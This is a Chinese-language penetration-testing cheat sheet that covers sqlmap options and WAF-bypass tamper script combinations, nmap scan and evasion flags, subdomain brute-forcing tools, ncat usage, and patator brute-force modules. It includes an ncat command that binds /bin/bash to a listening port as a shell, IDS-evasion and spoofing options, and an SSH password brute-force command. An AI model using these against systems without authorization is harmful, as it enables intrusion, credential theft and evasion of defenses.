sqlmap
-d
-u URL, --url=URL
-l
-m
-g
--method=METHOD
--data=DATA
--headers=HEADERS
--threads=THREADS
-p
--tamper=TAMPER
--time-sec=TIMESEC
--union-char=UCHAR
--dns-domain=DNS
--hostname
--users,--passwords,--privileges
--dbs,--tables,--columns,--dump
--dump-all
-D,-T,-C
--file-dest=DFILE
--os-cmd=OSCMD
--os-shell
--os-smbrelay
--os-bof
--priv-esc
--mobileImitate
--smart
--identify-waf
apostrophemask.py 用UTF-8全角字符替换单引号字符
apostrophenullencode.py 用非法双字节unicode字符替换单引号字符
appendnullbyte.py 在payload末尾添加空字符编码
base64encode.py 对给定的payload全部字符使用Base64编码
between.py 分别用“NOT BETWEEN 0 AND #”替换大于号“>”,“BETWEEN # AND #”替换等于号“=”
bluecoat.py 在SQL语句之后用有效的随机空白符替换空格符,随后用“LIKE”替换等于号“=”
chardoubleencode.py 对给定的payload全部字符使用双重URL编码(不处理已经编码的字符)
charencode.py 对给定的payload全部字符使用URL编码(不处理已经编码的字符)
charunicodeencode.py 对给定的payload的非编码字符使用Unicode URL编码(不处理已经编码的字符)
concat2concatws.py 用“CONCAT_WS(MID(CHAR(0), 0, 0), A, B)”替换像“CONCAT(A, B)”的实例
equaltolike.py 用“LIKE”运算符替换全部等于号“=”
greatest.py 用“GREATEST”函数替换大于号“>”
halfversionedmorekeywords.py 在每个关键字之前添加MySQL注释
ifnull2ifisnull.py 用“IF(ISNULL(A), B, A)”替换像“IFNULL(A, B)”的实例
lowercase.py 用小写值替换每个关键字字符
modsecurityversioned.py 用注释包围完整的查询
modsecurityzeroversioned.py 用当中带有数字零的注释包围完整的查询
multiplespaces.py 在SQL关键字周围添加多个空格
nonrecursivereplacement.py 用representations替换预定义SQL关键字,适用于过滤器
overlongutf8.py 转换给定的payload当中的所有字符
percentage.py 在每个字符之前添加一个百分号
randomcase.py 随机转换每个关键字字符的大小写
randomcomments.py 向SQL关键字中插入随机注释
securesphere.py 添加经过特殊构造的字符串
sp_password.py 向payload末尾添加“sp_password” for automatic obfuscation from DBMS logs
space2comment.py 用“”替换空格符
space2dash.py 用破折号注释符“--”其次是一个随机字符串和一个换行符替换空格符
space2hash.py 用磅注释符“#”其次是一个随机字符串和一个换行符替换空格符
space2morehash.py 用磅注释符“#”其次是一个随机字符串和一个换行符替换空格符
space2mssqlblank.py 用一组有效的备选字符集当中的随机空白符替换空格符
space2mssqlhash.py 用磅注释符“#”其次是一个换行符替换空格符
space2mysqlblank.py 用一组有效的备选字符集当中的随机空白符替换空格符
space2mysqldash.py 用破折号注释符“--”其次是一个换行符替换空格符
space2plus.py 用加号“+”替换空格符
space2randomblank.py 用一组有效的备选字符集当中的随机空白符替换空格符
unionalltounion.py 用“UNION SELECT”替换“UNION ALL SELECT”
unmagicquotes.py 用一个多字节组合%bf%27和末尾通用注释一起替换空格符
varnish.py 添加一个HTTP头“X-originating-IP”来绕过WAF
versionedkeywords.py 用MySQL注释包围每个非函数关键字
versionedmorekeywords.py 用MySQL注释包围每个关键字
xforwardedfor.py 添加一个伪造的HTTP头“X-Forwarded-For”来绕过WAF
普通tamper搭配方式:
tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
数据库为MSSQL的搭配方式:
tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes
数据库为MySql的搭配方式:
tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor
nmap
-sL 仅仅是显示,扫描的IP数目,不会进行任何扫描
-sn ping扫描,即主机发现
-Pn 不检测主机存活
-PS/PA/PU/PY[portlist] TCP SYN Ping/TCP ACK Ping/UDP Ping发现
-PE/PP/PM 使用ICMP echo, timestamp and netmask 请求包发现主机
-PO[prococol list] 使用IP协议包探测对方主机是否开启
-n/-R 不对IP进行域名反向解析/为所有的IP都进行域名的反响解析
-sS/sT/sA/sW/sM TCP SYN/TCP connect()/ACK/TCP窗口扫描/TCP Maimon扫描
-sU UDP扫描
-sN/sF/sX TCP NullFINand Xmas扫描
--scanflags 自定义TCP包中的flags
-sI zombie host[:probeport] Idlescan
-sY/sZ SCTP INIT/COOKIE-ECHO 扫描
-sO 使用IP protocol 扫描确定目标机支持的协议类型
-b “FTP relay host” 使用FTP bounce scan
-p 特定的端口 -p80,443 或者 -p1-65535
-p U:PORT 扫描udp的某个端口, -p U:53
-F 快速扫描模式,比默认的扫描端口还少
-r 不随机扫描端口,默认是随机扫描的
-f; --mtu value 指定使用分片、指定数据包的MTU.
-D decoy1,decoy2,ME 使用诱饵隐蔽扫描
-S IP-ADDRESS 源地址欺骗
-e interface 使用指定的接口
-g/ --source-port PROTNUM 使用指定源端口
--proxies url1,[url2],... 使用HTTP或者SOCKS4的代理
--data-length NUM 填充随机数据让数据包长度达到NUM
--ip-options OPTIONS 使用指定的IP选项来发送数据包
--ttl VALUE 设置IP time-to-live域
--spoof-mac ADDR/PREFIX/VEBDOR MAC地址伪装
--badsum 使用错误的checksum来发送数据包
-oN 将标准输出直接写入指定的文件
-oX 输出xml文件
--script=
auth: 负责处理鉴权证书(绕开鉴权)的脚本
broadcast: 在局域网内探查更多服务开启状况,如dhcp/dns/sqlserver等服务
brute: 提供暴力破解方式,针对常见的应用如http/snmp等
default: 使用-sC或-A选项扫描时候默认的脚本,提供基本脚本扫描能力
discovery: 对网络进行更多的信息,如SMB枚举、SNMP查询等
dos: 用于进行拒绝服务攻击
exploit: 利用已知的漏洞入侵系统
external: 利用第三方的数据库或资源,例如进行whois解析
fuzzer: 模糊测试的脚本,发送异常的包到目标机,探测出潜在漏洞 intrusive: 入侵性的脚本,此类脚本可能引发对方的IDS/IPS的记录或屏蔽
malware: 探测目标机是否感染了病毒、开启了后门等信息
safe: 此类与intrusive相反,属于安全性脚本
version: 负责增强服务与版本扫描(Version Detection)功能的脚本
vuln: 负责检查目标机是否有常见的漏洞(Vulnerability),如是否有MS08_067
sublist3r
-d
-b
-p
-v
-t
-O
subDomainsBrute
python subDomainsBrute.py --full xxx.cn
-f
--full
-t
-o
wydomain
python dnsburte.py -d xxx.cn
-t
-d
-f
-o
ncat
#端口扫描#
$nc -z -v -n 172.31.100.7 21-25
$ nc -v 172.31.100.7 21
#聊天#
$nc -l 1567
$nc 172.31.100.7 1567
#文件传输#
$nc -l 1567 > file.txt
nc 172.31.100.23 1567 < file.txt
#反弹shell#
$ ncat -l 10000 -e /bin/bash
#端口转发#
$ ncat -u -l 80-c 'ncat -u -l 8080'
patator
+ ftp_login : 暴力破解FTP
+ssh_login : 暴力破解 SSH
+telnet_login : 暴力破解 Telnet
+smtp_login : 暴力破解 SMTP
+smtp_vrfy : 使用SMTP VRFY进行枚举
+smtp_rcpt : 使用 SMTP RCPTTO枚举合法用户
+finger_lookup : 使用Finger枚举合法用户
+http_fuzz : 暴力破解 HTTP
+ajp_fuzz : 暴力破解 AJP
+pop_login : 暴力破解 POP3
+pop_passd : 暴力破解 poppassd(http://netwinsite.com/poppassd/)
+imap_login : 暴力破解 IMAP4
+ldap_login : 暴力破解 LDAP
+smb_login : 暴力破解 SMB
+smb_lookupsid : 暴力破解 SMB SID-lookup
+rlogin_login : 暴力破解 rlogin
+vmauthd_login : 暴力破解 VMware Authentication Daemon
+mssql_login : 暴力破解 MSSQL
+oracle_login : 暴力破解 Oracle
+mysql_login : 暴力破解 MySQL
+mysql_query : 暴力破解 MySQLqueries
+rdp_login : 暴力破解 RDP(NLA)
+pgsql_login : 暴力破解PostgreSQL
+vnc_login : 暴力破解 VNC
+dns_forward : 正向DNS 查询
+dns_reverse : 反向 DNS 查询
+snmp_login : 暴力破解 SNMPv1/2/3
+ike_enum : 枚举 IKE 传输
+unzip_pass : 暴力破解 ZIP加密文件
+keystore_pass : 暴力破解Java keystore files的密码
+sqlcipher_pass : 暴力破解加密数据库SQL Cipher的密码-
+umbraco_crack : Crack Umbraco HMAC-SHA1 password hashes
+tcp_fuzz : Fuzz TCP services
+dummy_test : 测试模块
python patator.py ssh_login --help
python patator.py ssh_login host=xxx.xxx.xxx.xxx user=FILE1 1=/root/user.txt password=FILE0 0=/root/newpass.txt